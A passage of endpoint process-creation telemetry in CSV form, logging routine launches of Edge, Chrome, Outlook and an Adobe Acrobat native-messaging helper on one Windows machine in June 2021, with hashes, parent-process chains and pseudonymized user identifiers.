00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+1261,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:42.729502700+00:00,4704,msedge.exe,"""msedge.exe"" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1988,3446608907217918886,11874100668059788691,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2500 /prefetch:3",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.015515900+00:00,20024,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:43.015915200+00:00,2021-06-23 00:52:50.751199800+00:00,611543cd-9a8e-4dff-a47a-bc2e3603b94d,computerpii_0a470890c60768167990033d701e7bd881398861,154828,False,10.7740.19041.1052,False,11540474045171833,,11540474045171836,2021-06-23 00:51:42.015515900+00:00,20024,2021-06-23 00:51:42.015515900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,20024,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 00:51:42.099396700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,1.0,1.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+1262,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:42.901566400+00:00,11776,msedge.exe,"""msedge.exe"" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1988,3446608907217918886,11874100668059788691,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:8",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.015515900+00:00,20024,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:43.171969300+00:00,2021-06-23 00:52:50.751352900+00:00,a4ed90bd-9c36-4459-9682-b7566ee0607a,computerpii_0a470890c60768167990033d701e7bd881398861,154833,False,10.7740.19041.1052,False,11540474045171833,,11540474045171837,2021-06-23 00:51:42.015515900+00:00,20024,2021-06-23 00:51:42.015515900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,20024,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 00:51:42.099396700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+1263,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:42.915074600+00:00,11880,chrome.exe,"""chrome.exe"" ",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:19.951048300+00:00,11452,explorer.exe,Explorer.EXE,False,2021-06-23 00:51:19.663301200+00:00,18268,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:43.175063100+00:00,2021-06-23 00:52:50.751382400+00:00,5ecf1f1c-6d7b-4c0b-b064-c83dc736878b,computerpii_0a470890c60768167990033d701e7bd881398861,154834,False,10.7740.19041.1052,False,11540474045171770,,11540474045171838,2021-06-23 00:51:19.951048300+00:00,11452,2021-06-23 00:51:19.951048300+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,11452,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-23 00:51:19.952611900+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,20481.0,1.0,3073.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+1264,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:42.963728400+00:00,11736,msedge.exe,"""msedge.exe"" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1988,3446608907217918886,11874100668059788691,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3172 /prefetch:8",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.015515900+00:00,20024,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:43.213427200+00:00,2021-06-23 00:52:50.751413500+00:00,0019c9db-39e3-455e-b80e-24c81b95824f,computerpii_0a470890c60768167990033d701e7bd881398861,154835,False,10.7740.19041.1052,False,11540474045171833,,11540474045171839,2021-06-23 00:51:42.015515900+00:00,20024,2021-06-23 00:51:42.015515900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,20024,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 00:51:42.099396700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+1265,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:43.341401100+00:00,9760,msedge.exe,"""msedge.exe"" --type=renderer --field-trial-handle=1988,3446608907217918886,11874100668059788691,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3908 /prefetch:1",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.015515900+00:00,20024,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:43.473524+00:00,2021-06-23 00:52:50.751531200+00:00,309b658a-2dfb-4942-94ce-be361425f349,computerpii_0a470890c60768167990033d701e7bd881398861,154839,False,10.7740.19041.1052,False,11540474045171833,,11540474045171843,2021-06-23 00:51:42.015515900+00:00,20024,2021-06-23 00:51:42.015515900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,20024,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 00:51:42.099396700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+1266,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:43.350537700+00:00,19172,msedge.exe,"""msedge.exe"" --type=renderer --field-trial-handle=1988,3446608907217918886,11874100668059788691,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3936 /prefetch:1",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.015515900+00:00,20024,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:43.488480+00:00,2021-06-23 00:52:50.751589200+00:00,65d82b41-65d2-4bcd-82fe-b1a996b8896b,computerpii_0a470890c60768167990033d701e7bd881398861,154841,False,10.7740.19041.1052,False,11540474045171833,,11540474045171844,2021-06-23 00:51:42.015515900+00:00,20024,2021-06-23 00:51:42.015515900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,20024,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 00:51:42.099396700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+1267,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:43.564026600+00:00,16176,OUTLOOK.EXE,"""OUTLOOK.EXE"" ",PortableExecutable,2021-06-12 08:57:23.540503500+00:00,C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,41367344,553bf7f8c0e762a4c89b34bc6a1e8472,40d1ffbfc08e1c8fdbf1424840b87dc7f6b64cd8ab495a498aaf8cb0df715dc9,222ef0a57b2bb0eab87583daa000f1c8bca664b9,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:19.951048300+00:00,11452,explorer.exe,Explorer.EXE,False,2021-06-23 00:51:19.663301200+00:00,18268,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:43.886301700+00:00,2021-06-23 00:52:50.751824300+00:00,5af9be26-5897-448b-bd48-b4bf243062ba,computerpii_0a470890c60768167990033d701e7bd881398861,154849,False,10.7740.19041.1052,False,11540474045171770,,11540474045171845,2021-06-23 00:51:19.951048300+00:00,11452,2021-06-23 00:51:19.951048300+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,11452,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-23 00:51:19.952611900+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,20481.0,1.0,3073.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Microsoft Corporation,Microsoft Outlook,16.0.13801.20738,Outlook,Outlook.exe,Microsoft Outlook
+1268,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:45.363492700+00:00,9140,msedge.exe,"""msedge.exe"" --type=renderer --field-trial-handle=1988,3446608907217918886,11874100668059788691,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2500 /prefetch:1",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.015515900+00:00,20024,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:45.463730600+00:00,2021-06-23 00:52:50.752669800+00:00,a6a3c5e6-c079-47d9-8ecb-5f43be72fc94,computerpii_0a470890c60768167990033d701e7bd881398861,154882,False,10.7740.19041.1052,False,11540474045171833,,11540474045171856,2021-06-23 00:51:42.015515900+00:00,20024,2021-06-23 00:51:42.015515900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,20024,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 00:51:42.099396700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+1269,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:45.806583600+00:00,8756,cmd.exe,"cmd.exe /d /c ""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe"" chrome-extension://efaidnbmnnnibpcajpcglclefindmkaj/ --parent-window=0 < \\.\pipe\chrome.nativeMessaging.in.d6a7ee70a7383142 > \\.\pipe\chrome.nativeMessaging.out.d6a7ee70a7383142",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.915074600+00:00,11880,chrome.exe,"""chrome.exe"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:45.933154300+00:00,2021-06-23 00:52:50.752873400+00:00,3529e044-7081-4c97-bc07-733496570c3f,computerpii_0a470890c60768167990033d701e7bd881398861,154889,False,10.7740.19041.1052,False,11540474045171838,,11540474045171857,2021-06-23 00:51:42.915074600+00:00,11880,2021-06-23 00:51:42.915074600+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,11880,18560,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,0.0,1.0,,,,,,,Invalid,Unknown,Valid,OsVendor,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+1270,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:45.908790700+00:00,4516,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:45.806583600+00:00,8756,cmd.exe,"cmd.exe /d /c ""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe"" chrome-extension://efaidnbmnnnibpcajpcglclefindmkaj/ --parent-window=0 < \\.\pipe\chrome.nativeMessaging.in.d6a7ee70a7383142 > \\.\pipe\chrome.nativeMessaging.out.d6a7ee70a7383142",False,2021-06-23 00:51:42.915074600+00:00,11880,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:45.962694600+00:00,2021-06-23 